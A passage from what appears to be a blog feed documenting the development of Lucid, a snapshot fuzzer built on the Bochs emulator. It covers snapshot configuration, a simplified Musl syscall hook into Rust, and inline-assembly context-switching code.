5. Restore the Bochs state from...
6. Begin simulation
7. Quit now

Please choose one: [6] 
</span></code></pre></div></div>

<p>We’ll want to just being simulation, so enter 6 here. When we do, we should eventually be booted into this screen for GRUB to choose what to boot into, we just select <code class="language-plaintext highlighter-rouge">Lucid Linux</code>:</p>

<p><img src="/assets/images/pwn/BootBochs.PNG" alt="Bochs Boot" /></p>

<p>Once we boot and get our shell, I just have to call <code class="language-plaintext highlighter-rouge">harness</code> from the command line since its automatically in my <code class="language-plaintext highlighter-rouge">$PATH</code> and save the Bochs state to disk!</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Please choose one: [6] 6
00000000000i[      ] installing sdl2 module as the Bochs GUI
00000000000i[SDL2  ] maximum host resolution: x=1704 y=1439
00000000000i[      ] using log file bochsout.txt
Saving Lucid snapshot to '/tmp/lucid_snapshot'...
Successfully saved snapshot
</code></pre></div></div>

<p>Now, <code class="language-plaintext highlighter-rouge">/tmp/lucid_snapshot</code> has all of the information to resume this saved Bochs state inside Lucid’s Bochs. We just need to go and comment out the display library line from <code class="language-plaintext highlighter-rouge">/tmp/lucid_snapshot/config</code> as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># configuration file generated by Bochs
plugin_ctrl: unmapped=true, biosdev=true, speaker=true, extfpuirq=true, parallel=true, serial=true, e1000=false
config_interface: textconfig
#display_library: sdl2
</code></pre></div></div>

<p>Next, we just have to run Lucid and give it the right Bochs arguments to resume that saved state from disk:
<code class="language-plaintext highlighter-rouge">./lucid --input-signature 0x13371337133713371338133813381338 --verbose --bochs-image /tmp/lucid_bochs --bochs-args -f /home/h0mbre/git_bochs/Bochs/bochs/bochsrc_nogui.txt -q -r /tmp/lucid_snapshot</code></p>

<p>Here are the contents of those configuration files, both for the GUI vanilla Bochs, and the one we pass here to Lucid’s Bochs, the only difference is the commented out display library line:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>romimage: file="/home/h0mbre/git_bochs/Bochs/bochs/bios/BIOS-bochs-latest"
vgaromimage: file="/home/h0mbre/git_bochs/Bochs/bochs/bios/VGABIOS-lgpl-latest"
pci: enabled=1, chipset=i440fx
boot: cdrom
ata0-master: type=cdrom, path="/home/h0mbre/custom_linux/lucid_linux.iso", status=inserted
log: bochsout.txt
clock: sync=realtime, time0=local
cpu: model=corei7_skylake_x
cpu: count=1, ips=750000000, reset_on_triple_fault=1, ignore_bad_msrs=1
cpu: cpuid_limit_winnt=0
memory: guest=64, host=64
#display_library: sdl2
</code></pre></div></div>

<p>Really not much to it, you just have to put the <code class="language-plaintext highlighter-rouge">iso</code> in the right device and say that it’s <code class="language-plaintext highlighter-rouge">inserted</code> and you should be good to go. We can actually fuzz stuff now!</p>

<p><img src="/assets/images/pwn/LucidStats.PNG" alt="Lucid Stats" /></p>

<h1 id="conclusion">Conclusion</h1>
<p>Now that its conceivable we can fuzz stuff with this now, there is a lot of small changes that need to take place that I will work on in the future:</p>
<ul>
  <li>Mutator: Right now there is a stand-in toy mutator for demo purposes, and I think we actually won’t do any mutation stuff on this blog. I’ll probably add Brandon’s basic <a href="https://github.com/gamozolabs/basic_mutator">mutator</a> to the fuzzer as the default, but I think I can make it bring your input generator fairly easily with Rust traits, we’ll see on that. Maybe that will be a blogpost who knows.</li>
  <li>Corpus mangagement: Right now there is none! That should be fairly trivial to do however, not worth a blogpost</li>
  <li>Parallelization: This will be a fun blogpost I think, I’d like the fuzzer to be easily parallelizable and maybe distributed across nodes. I’d like to get this thing fuzzing on my servers I bought a few years ago and never used lol.</li>
  <li>Redqueen: We have such easy access to the relevant instructions that we have to implement this feature, it’s a huge boost to efficiency.</li>
  <li>LibAFL Integration: This will definitely be a blogpost, we want this to eventually serve as the execution engine for LibAFL.</li>
</ul>

<p>Maybe in the next blogpost, we’ll try to fuzz a real target and find an N-Day? That would be fun if the input generation aspect isn’t too much labor. Let me know what you want to see, until next time.</p>]]></content><author><name></name></author><category term="Fuzzing" /><category term="Fuzzer" /><category term="Development" /><category term="Emulator" /><category term="Bochs" /><summary type="html"><![CDATA[Background]]></summary></entry><entry><title type="html">Fuzzer Development 3: Building Bochs, MMU, and File I/0</title><link href="https://h0mbre.github.io/Loading_Bochs/" rel="alternate" type="text/html" title="Fuzzer Development 3: Building Bochs, MMU, and File I/0" /><published>2024-03-05T00:00:00+00:00</published><updated>2024-03-05T00:00:00+00:00</updated><id>https://h0mbre.github.io/Loading_Bochs</id><content type="html" xml:base="https://h0mbre.github.io/Loading_Bochs/"><![CDATA[<h2 id="background">Background</h2>

<p>This is the next installment in a series of blogposts detailing the development process of a snapshot fuzzer that aims to utilize Bochs as a target execution engine. You can find the fuzzer and code in the <a href="https://github.com/h0mbre/Lucid">Lucid repository</a></p>

<h2 id="introduction">Introduction</h2>

<p>We’re continuing today on our journey to develop our fuzzer. Last time we left off, we had developed the beginnings of a context-switching infrastructure so that we could sandbox Bochs (really a test program) from touching the OS kernel during syscalls.</p>

<p>In this post, we’re going to go over some changes and advancements we’ve made to the fuzzer and also document some progress related to Bochs itself.</p>

<h2 id="syscall-infrastructure-update">Syscall Infrastructure Update</h2>

<p>After putting out the last blogpost, I got some really good feedback and suggestions by Fuzzing discord legend <a href="https://twitter.com/ButTested">WorksButNotTested</a>, who informed me that we could cut down on a lot of complexity if we scrapped the full context-switching/C-ABI-to-Syscall-ABI-Register-Translation routines all together and simply had Bochs call a Rust function from C for syscalls. This is very intuitive and obvious in hindsight and I’m admittedly a little embarrassed to have overlooked this possibility.</p>

<p>Previously, in our custom Musl code, we would have a C function call like so:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kr">__inline</span> <span class="kt">long</span> <span class="nf">__syscall6</span><span class="p">(</span><span class="kt">long</span> <span class="n">n</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a1</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a2</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a3</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a4</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a5</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a6</span><span class="p">)</span>
<span class="p">{</span>
	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">ret</span><span class="p">;</span>
	<span class="k">register</span> <span class="kt">long</span> <span class="n">r10</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">"r10"</span><span class="p">)</span> <span class="o">=</span> <span class="n">a4</span><span class="p">;</span>
	<span class="k">register</span> <span class="kt">long</span> <span class="n">r8</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">"r8"</span><span class="p">)</span> <span class="o">=</span> <span class="n">a5</span><span class="p">;</span>
	<span class="k">register</span> <span class="kt">long</span> <span class="n">r9</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">"r9"</span><span class="p">)</span> <span class="o">=</span> <span class="n">a6</span><span class="p">;</span>
	<span class="n">__asm__</span> <span class="n">__volatile__</span> <span class="p">(</span><span class="s">"syscall"</span> <span class="o">:</span> <span class="s">"=a"</span><span class="p">(</span><span class="n">ret</span><span class="p">)</span> <span class="o">:</span> <span class="s">"a"</span><span class="p">(</span><span class="n">n</span><span class="p">),</span> <span class="s">"D"</span><span class="p">(</span><span class="n">a1</span><span class="p">),</span> <span class="s">"S"</span><span class="p">(</span><span class="n">a2</span><span class="p">),</span>
						  <span class="s">"d"</span><span class="p">(</span><span class="n">a3</span><span class="p">),</span> <span class="s">"r"</span><span class="p">(</span><span class="n">r10</span><span class="p">),</span> <span class="s">"r"</span><span class="p">(</span><span class="n">r8</span><span class="p">),</span> <span class="s">"r"</span><span class="p">(</span><span class="n">r9</span><span class="p">)</span> <span class="o">:</span> <span class="s">"rcx"</span><span class="p">,</span> <span class="s">"r11"</span><span class="p">,</span> <span class="s">"memory"</span><span class="p">);</span>
	<span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>This is the function that is called when the program needs to make a <code class="language-plaintext highlighter-rouge">syscall</code> with 6 arguments. In the previous blog, we changed this function to be an if/else such that if the program was running under Lucid, we would instead call into Lucid’s context-switch function after shuffling the C ABI registers to Syscall registers like so:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kr">__inline</span> <span class="kt">long</span> <span class="nf">__syscall6_original</span><span class="p">(</span><span class="kt">long</span> <span class="n">n</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a1</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a2</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a3</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a4</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a5</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a6</span><span class="p">)</span>
<span class="p">{</span>
	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">ret</span><span class="p">;</span>
	<span class="k">register</span> <span class="kt">long</span> <span class="n">r10</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">"r10"</span><span class="p">)</span> <span class="o">=</span> <span class="n">a4</span><span class="p">;</span>
	<span class="k">register</span> <span class="kt">long</span> <span class="n">r8</span>  <span class="n">__asm__</span><span class="p">(</span><span class="s">"r8"</span><span class="p">)</span>  <span class="o">=</span> <span class="n">a5</span><span class="p">;</span>
	<span class="k">register</span> <span class="kt">long</span> <span class="n">r9</span>  <span class="n">__asm__</span><span class="p">(</span><span class="s">"r9"</span><span class="p">)</span>  <span class="o">=</span> <span class="n">a6</span><span class="p">;</span>
	<span class="n">__asm__</span> <span class="n">__volatile__</span> <span class="p">(</span><span class="s">"syscall"</span> <span class="o">:</span> <span class="s">"=a"</span><span class="p">(</span><span class="n">ret</span><span class="p">)</span> <span class="o">:</span> <span class="s">"a"</span><span class="p">(</span><span class="n">n</span><span class="p">),</span> <span class="s">"D"</span><span class="p">(</span><span class="n">a1</span><span class="p">),</span> <span class="s">"S"</span><span class="p">(</span><span class="n">a2</span><span class="p">),</span> <span class="s">"d"</span><span class="p">(</span><span class="n">a3</span><span class="p">),</span> <span class="s">"r"</span><span class="p">(</span><span class="n">r10</span><span class="p">),</span>
							<span class="s">"r"</span><span class="p">(</span><span class="n">r8</span><span class="p">),</span> <span class="s">"r"</span><span class="p">(</span><span class="n">r9</span><span class="p">)</span> <span class="o">:</span> <span class="s">"rcx"</span><span class="p">,</span> <span class="s">"r11"</span><span class="p">,</span> <span class="s">"memory"</span><span class="p">);</span>

	<span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kr">__inline</span> <span class="kt">long</span> <span class="nf">__syscall6</span><span class="p">(</span><span class="kt">long</span> <span class="n">n</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a1</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a2</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a3</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a4</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a5</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a6</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">g_lucid_ctx</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="n">__syscall6_original</span><span class="p">(</span><span class="n">n</span><span class="p">,</span> <span class="n">a1</span><span class="p">,</span> <span class="n">a2</span><span class="p">,</span> <span class="n">a3</span><span class="p">,</span> <span class="n">a4</span><span class="p">,</span> <span class="n">a5</span><span class="p">,</span> <span class="n">a6</span><span class="p">);</span> <span class="p">}</span>
	
    <span class="k">register</span> <span class="kt">long</span> <span class="n">ret</span><span class="p">;</span>
    <span class="k">register</span> <span class="kt">long</span> <span class="n">r12</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">"r12"</span><span class="p">)</span> <span class="o">=</span> <span class="p">(</span><span class="kt">size_t</span><span class="p">)(</span><span class="n">g_lucid_ctx</span><span class="o">-&gt;</span><span class="n">exit_handler</span><span class="p">);</span>
    <span class="k">register</span> <span class="kt">long</span> <span class="n">r13</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">"r13"</span><span class="p">)</span> <span class="o">=</span> <span class="p">(</span><span class="kt">size_t</span><span class="p">)(</span><span class="o">&amp;</span><span class="n">g_lucid_ctx</span><span class="o">-&gt;</span><span class="n">register_bank</span><span class="p">);</span>
    <span class="k">register</span> <span class="kt">long</span> <span class="n">r14</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">"r14"</span><span class="p">)</span> <span class="o">=</span> <span class="n">SYSCALL</span><span class="p">;</span>
    <span class="k">register</span> <span class="kt">long</span> <span class="n">r15</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">"r15"</span><span class="p">)</span> <span class="o">=</span> <span class="p">(</span><span class="kt">size_t</span><span class="p">)(</span><span class="n">g_lucid_ctx</span><span class="p">);</span>
    
    <span class="n">__asm__</span> <span class="n">__volatile__</span> <span class="p">(</span>
        <span class="s">"mov %1, %%rax</span><span class="se">\n\t</span><span class="s">"</span>
	<span class="s">"mov %2, %%rdi</span><span class="se">\n\t</span><span class="s">"</span>
	<span class="s">"mov %3, %%rsi</span><span class="se">\n\t</span><span class="s">"</span>
	<span class="s">"mov %4, %%rdx</span><span class="se">\n\t</span><span class="s">"</span>
	<span class="s">"mov %5, %%r10</span><span class="se">\n\t</span><span class="s">"</span>
	<span class="s">"mov %6, %%r8</span><span class="se">\n\t</span><span class="s">"</span>
	<span class="s">"mov %7, %%r9</span><span class="se">\n\t</span><span class="s">"</span>
        <span class="s">"call *%%r12</span><span class="se">\n\t</span><span class="s">"</span>
        <span class="s">"mov %%rax, %0</span><span class="se">\n\t</span><span class="s">"</span>
        <span class="o">:</span> <span class="s">"=r"</span> <span class="p">(</span><span class="n">ret</span><span class="p">)</span>
        <span class="o">:</span> <span class="s">"r"</span> <span class="p">(</span><span class="n">n</span><span class="p">),</span> <span class="s">"r"</span> <span class="p">(</span><span class="n">a1</span><span class="p">),</span> <span class="s">"r"</span> <span class="p">(</span><span class="n">a2</span><span class="p">),</span> <span class="s">"r"</span> <span class="p">(</span><span class="n">a3</span><span class="p">),</span> <span class="s">"r"</span> <span class="p">(</span><span class="n">a4</span><span class="p">),</span> <span class="s">"r"</span> <span class="p">(</span><span class="n">a5</span><span class="p">),</span> <span class="s">"r"</span> <span class="p">(</span><span class="n">a6</span><span class="p">),</span>
		  <span class="s">"r"</span> <span class="p">(</span><span class="n">r12</span><span class="p">),</span> <span class="s">"r"</span> <span class="p">(</span><span class="n">r13</span><span class="p">),</span> <span class="s">"r"</span> <span class="p">(</span><span class="n">r14</span><span class="p">),</span> <span class="s">"r"</span> <span class="p">(</span><span class="n">r15</span><span class="p">)</span>
        <span class="o">:</span> <span class="s">"rax"</span><span class="p">,</span> <span class="s">"rcx"</span><span class="p">,</span> <span class="s">"r11"</span><span class="p">,</span> <span class="s">"memory"</span>
    <span class="p">);</span>
	
	<span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>So this was quite involved. I was very fixated on the idea that “Lucid has to be the kernel. And when userland programs execute a syscall, their state is saved and execution is started in the kernel”. This proved to lead me astray since such a complicated routine is not needed for our purposes, we are not actually a kernel, we just want to sandbox away syscalls for one specific program who behaves pretty well. WorksButNotTested instead suggested just calling a Rust function like so:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kr">__inline</span> <span class="kt">long</span> <span class="nf">__syscall6</span><span class="p">(</span><span class="kt">long</span> <span class="n">n</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a1</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a2</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a3</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a4</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a5</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a6</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">g_lucid_syscall</span><span class="p">)</span>
		<span class="k">return</span> <span class="n">g_lucid_syscall</span><span class="p">(</span><span class="n">g_lucid_ctx</span><span class="p">,</span> <span class="n">n</span><span class="p">,</span> <span class="n">a1</span><span class="p">,</span> <span class="n">a2</span><span class="p">,</span> <span class="n">a3</span><span class="p">,</span> <span class="n">a4</span><span class="p">,</span> <span class="n">a5</span><span class="p">,</span> <span class="n">a6</span><span class="p">);</span>
	
	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">ret</span><span class="p">;</span>
	<span class="k">register</span> <span class="kt">long</span> <span class="n">r10</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">"r10"</span><span class="p">)</span> <span class="o">=</span> <span class="n">a4</span><span class="p">;</span>
	<span class="k">register</span> <span class="kt">long</span> <span class="n">r8</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">"r8"</span><span class="p">)</span> <span class="o">=</span> <span class="n">a5</span><span class="p">;</span>
	<span class="k">register</span> <span class="kt">long</span> <span class="n">r9</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">"r9"</span><span class="p">)</span> <span class="o">=</span> <span class="n">a6</span><span class="p">;</span>
	<span class="n">__asm__</span> <span class="n">__volatile__</span> <span class="p">(</span><span class="s">"syscall"</span> <span class="o">:</span> <span class="s">"=a"</span><span class="p">(</span><span class="n">ret</span><span class="p">)</span> <span class="o">:</span> <span class="s">"a"</span><span class="p">(</span><span class="n">n</span><span class="p">),</span> <span class="s">"D"</span><span class="p">(</span><span class="n">a1</span><span class="p">),</span> <span class="s">"S"</span><span class="p">(</span><span class="n">a2</span><span class="p">),</span>
						  <span class="s">"d"</span><span class="p">(</span><span class="n">a3</span><span class="p">),</span> <span class="s">"r"</span><span class="p">(</span><span class="n">r10</span><span class="p">),</span> <span class="s">"r"</span><span class="p">(</span><span class="n">r8</span><span class="p">),</span> <span class="s">"r"</span><span class="p">(</span><span class="n">r9</span><span class="p">)</span> <span class="o">:</span> <span class="s">"rcx"</span><span class="p">,</span> <span class="s">"r11"</span><span class="p">,</span> <span class="s">"memory"</span><span class="p">);</span>
	<span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Obviously this is a much simpler solution and we get to avoid scrambling registers/saving state/inline-assembly and the rest of it. To set this function up, we just simply created a new function pointer global variable in <code class="language-plaintext highlighter-rouge">lucid.h</code> in Musl and gave it a definition in <code class="language-plaintext highlighter-rouge">src/lucid.c</code> which can you see in the Musl patches in the repo. <code class="language-plaintext highlighter-rouge">g_lucid_syscall</code> looks like this on the Rust side:</p>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">pub</span> <span class="k">extern</span> <span class="s">"C"</span> <span class="k">fn</span> <span class="nf">lucid_syscall</span><span class="p">(</span><span class="n">contextp</span><span class="p">:</span> <span class="o">*</span><span class="k">mut</span> <span class="n">LucidContext</span><span class="p">,</span> <span class="n">n</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span>
    <span class="n">a1</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span> <span class="n">a2</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span> <span class="n">a3</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span> <span class="n">a4</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span> <span class="n">a5</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span> <span class="n">a6</span><span class="p">:</span> <span class="nb">usize</span><span class="p">)</span>
    <span class="k">-&gt;</span> <span class="nb">u64</span> 
</code></pre></div></div>

<p>We get to use the C ABI to our advantage and maintain the semantics of how a program would normally use Musl, and it’s just a very much appreciated suggestion and I couldn’t be happier with how it turned out.</p>

<h2 id="calling-convention-changes">Calling Convention Changes</h2>

<p>During this refactoring for syscalls, I also simplified the way our context-switching calling convention would work. Instead of using 4 separate registers for the calling convention, I decided it was doable by just passing a pointer to the Lucid execution context and having the <code class="language-plaintext highlighter-rouge">context_switch</code> function itself work out how it should behave based on the context’s values. In essence, we’re moving complexity from the caller-side to the callee-side. This means that the complexity doesn’t keep recurring throughout the codebase, it is encapsulated one time, in the <code class="language-plaintext highlighter-rouge">context_switch</code> logic itself. This does require some hacky/brittle code however, for instance we have to hardcode some struct offsets for the Lucid execution data structure, but that is a small price to pay in my opinion for drastically reduced complexity. The <code class="language-plaintext highlighter-rouge">context_switch</code> code has been changed to the following</p>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">extern</span> <span class="s">"C"</span> <span class="p">{</span> <span class="k">fn</span> <span class="nf">context_switch</span><span class="p">();</span> <span class="p">}</span>
<span class="nd">global_asm!</span><span class="p">(</span>
    <span class="s">".global context_switch"</span><span class="p">,</span>
    <span class="s">"context_switch:"</span><span class="p">,</span>

    <span class="c1">// Save the CPU flags before we do any operations</span>
    <span class="s">"pushfq"</span><span class="p">,</span>

    <span class="c1">// Save registers we use for scratch</span>
    <span class="s">"push r14"</span><span class="p">,</span>
    <span class="s">"push r13"</span><span class="p">,</span>

    <span class="c1">// Determine what execution mode we're in</span>
    <span class="s">"mov r14, r15"</span><span class="p">,</span>
    <span class="s">"add r14, 0x8"</span><span class="p">,</span>     <span class="c1">// mode is at offset 0x8 from base</span>
    <span class="s">"mov r14, [r14]"</span><span class="p">,</span>
    <span class="s">"cmp r14d, 0x0"</span><span class="p">,</span>
    <span class="s">"je save_bochs"</span><span class="p">,</span>

    <span class="c1">// We're in Lucid mode so save Lucid GPRs</span>
    <span class="s">"save_lucid: "</span><span class="p">,</span>
    <span class="s">"mov r14, r15"</span><span class="p">,</span>
    <span class="s">"add r14, 0x10"</span><span class="p">,</span>    <span class="c1">// lucid_regs is at offset 0x10 from base</span>
    <span class="s">"jmp save_gprs"</span><span class="p">,</span>             

    <span class="c1">// We're in Bochs mode so save Bochs GPRs</span>
    <span class="s">"save_bochs: "</span><span class="p">,</span>
    <span class="s">"mov r14, r15"</span><span class="p">,</span>
    <span class="s">"add r14, 0x90"</span><span class="p">,</span>    <span class="c1">// bochs_regs is at offset 0x90 from base</span>
    <span class="s">"jmp save_gprs"</span><span class="p">,</span>
</code></pre></div></div>

<p>You can see that once we hit the <code class="language-plaintext highlighter-rouge">context_switch</code> function we save the CPU flags before we do anything that would affect them, then we save a couple of registers that we use as scratch registers. Then we’re free to check the value of <code class="language-plaintext highlighter-rouge">context-&gt;mode</code> in order to determine what mode of execution we’re in. Based on that value, we are able to know what register bank to use to save our general-purpose registers. So yes, we do have to hardcode some offsets, but I believe overall this is a much better API and system for context-switching callees and the data-structure itself should be relatively stable at this point and not require massive refactoring.</p>

<h2 id="introducing-faults">Introducing Faults</h2>

<p>Since the last blog-post, I’ve introduced the concept of <code class="language-plaintext highlighter-rouge">Fault</code> which is an error class that is reserved for instances when some sort of error is encountered during either context-switching code or syscall-handling. This error is distinct from our highest-level error <code class="language-plaintext highlighter-rouge">LucidErr</code>. Ultimately, these faults are plumbed back up to Lucid when they are encountered so that Lucid can handle them. As of this moment, Lucid calls any <code class="language-plaintext highlighter-rouge">Fault</code> fatal.</p>

<p>We are able to plumb these back up to Lucid because before starting Bochs execution we now save Lucid’s state and <em>context-switch</em> into starting Bochs:</p>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nd">#[inline(never)]</span>
<span class="k">pub</span> <span class="k">fn</span> <span class="nf">start_bochs</span><span class="p">(</span><span class="n">context</span><span class="p">:</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="n">LucidContext</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Set the execution mode and the reason why we're exiting the Lucid VM</span>
    <span class="n">context</span><span class="py">.mode</span> <span class="o">=</span> <span class="nn">ExecMode</span><span class="p">::</span><span class="n">Lucid</span><span class="p">;</span>
    <span class="n">context</span><span class="py">.exit_reason</span> <span class="o">=</span> <span class="nn">VmExit</span><span class="p">::</span><span class="n">StartBochs</span><span class="p">;</span>

    <span class="c1">// Set up the calling convention and then start Bochs by context switching</span>
    <span class="k">unsafe</span> <span class="p">{</span>
        <span class="nd">asm!</span><span class="p">(</span>
            <span class="s">"push r15"</span><span class="p">,</span> <span class="c1">// Callee-saved register we have to preserve</span>
            <span class="s">"mov r15, {0}"</span><span class="p">,</span> <span class="c1">// Move context into R15</span>
            <span class="s">"call qword ptr [r15]"</span><span class="p">,</span> <span class="c1">// Call context_switch</span>
            <span class="s">"pop r15"</span><span class="p">,</span>  <span class="c1">// Restore callee-saved register</span>
            <span class="k">in</span><span class="p">(</span><span class="n">reg</span><span class="p">)</span> <span class="n">context</span> <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="n">LucidContext</span><span class="p">,</span>
        <span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>We make some changes to the execution context, namely marking the execution mode (Lucid-mode) and setting the reason why we’re context-switching (to start Bochs). Then in the inline assembly, we call the function pointer at offset 0 in the execution context structure:</p>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Execution context that is passed between Lucid and Bochs that tracks</span>
<span class="c1">// all of the mutable state information we need to do context-switching</span>
<span class="nd">#[repr(C)]</span>
<span class="nd">#[derive(Clone)]</span>
<span class="k">pub</span> <span class="k">struct</span> <span class="n">LucidContext</span> <span class="p">{</span>
    <span class="k">pub</span> <span class="n">context_switch</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span>  <span class="c1">// Address of context_switch()</span>
</code></pre></div></div>

<p>So then our Lucid state is saved in the <code class="language-plaintext highlighter-rouge">context_switch</code> routine and we are then passed to this logic:</p>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Handle Lucid context switches here</span>
    <span class="k">if</span> <span class="nn">LucidContext</span><span class="p">::</span><span class="nf">is_lucid_mode</span><span class="p">(</span><span class="n">context</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">match</span> <span class="n">exit_reason</span> <span class="p">{</span>
            <span class="c1">// Dispatch to Bochs entry point</span>
            <span class="nn">VmExit</span><span class="p">::</span><span class="n">StartBochs</span> <span class="k">=&gt;</span> <span class="p">{</span>
                <span class="nf">jump_to_bochs</span><span class="p">(</span><span class="n">context</span><span class="p">);</span>
            <span class="p">},</span>
            <span class="n">_</span> <span class="k">=&gt;</span> <span class="p">{</span>
                <span class="nd">fault!</span><span class="p">(</span><span class="n">context</span><span class="p">,</span> <span class="nn">Fault</span><span class="p">::</span><span class="n">BadLucidExit</span><span class="p">);</span>
            <span class="p">}</span>
        <span class="p">}</span>
    <span class="p">}</span>
</code></pre></div></div>

<p>Finally, we call <code class="language-plaintext highlighter-rouge">jump_to_bochs</code>:</p>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Standalone function to literally jump to Bochs entry and provide the stack</span>
<span class="c1">// address to Bochs</span>
<span class="k">fn</span> <span class="nf">jump_to_bochs</span><span class="p">(</span><span class="n">context</span><span class="p">:</span> <span class="o">*</span><span class="k">mut</span> <span class="n">LucidContext</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// RDX: we have to clear this register as the ABI specifies that exit</span>
    <span class="c1">// hooks are set when rdx is non-null at program start</span>
    <span class="c1">//</span>
    <span class="c1">// RAX: arbitrarily used as a jump target to the program entry</span>
    <span class="c1">//</span>
    <span class="c1">// RSP: Rust does not allow you to use 'rsp' explicitly with in(), so we</span>
    <span class="c1">// have to manually set it with a `mov`</span>
    <span class="c1">//</span>
    <span class="c1">// R15: holds a pointer to the execution context, if this value is non-</span>
    <span class="c1">// null, then Bochs learns at start time that it is running under Lucid</span>
    <span class="c1">//</span>
    <span class="c1">// We don't really care about execution order as long as we specify clobbers</span>
    <span class="c1">// with out/lateout, that way the compiler doesn't allocate a register we </span>
    <span class="c1">// then immediately clobber</span>
    <span class="k">unsafe</span> <span class="p">{</span>
        <span class="nd">asm!</span><span class="p">(</span>
            <span class="s">"xor rdx, rdx"</span><span class="p">,</span>
            <span class="s">"mov rsp, {0}"</span><span class="p">,</span>
            <span class="s">"mov r15, {1}"</span><span class="p">,</span>
            <span class="s">"jmp rax"</span><span class="p">,</span>
            <span class="k">in</span><span class="p">(</span><span class="n">reg</span><span class="p">)</span> <span class="p">(</span><span class="o">*</span><span class="n">context</span><span class="p">)</span><span class="py">.bochs_rsp</span><span class="p">,</span>
            <span class="k">in</span><span class="p">(</span><span class="n">reg</span><span class="p">)</span> <span class="n">context</span><span class="p">,</span>
            <span class="k">in</span><span class="p">(</span><span class="s">"rax"</span><span class="p">)</span> <span class="p">(</span><span class="o">*</span><span class="n">context</span><span class="p">)</span><span class="py">.bochs_entry</span><span class="p">,</span>
            <span class="nf">lateout</span><span class="p">(</span><span class="s">"rax"</span><span class="p">)</span> <span class="n">_</span><span class="p">,</span>   <span class="c1">// Clobber (inout so no conflict with in)</span>
            <span class="nf">out</span><span class="p">(</span><span class="s">"rdx"</span><span class="p">)</span> <span class="n">_</span><span class="p">,</span>       <span class="c1">// Clobber</span>
            <span class="nf">out</span><span class="p">(</span><span class="s">"r15"</span><span class="p">)</span> <span class="n">_</span><span class="p">,</span>       <span class="c1">// Clobber</span>
        <span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

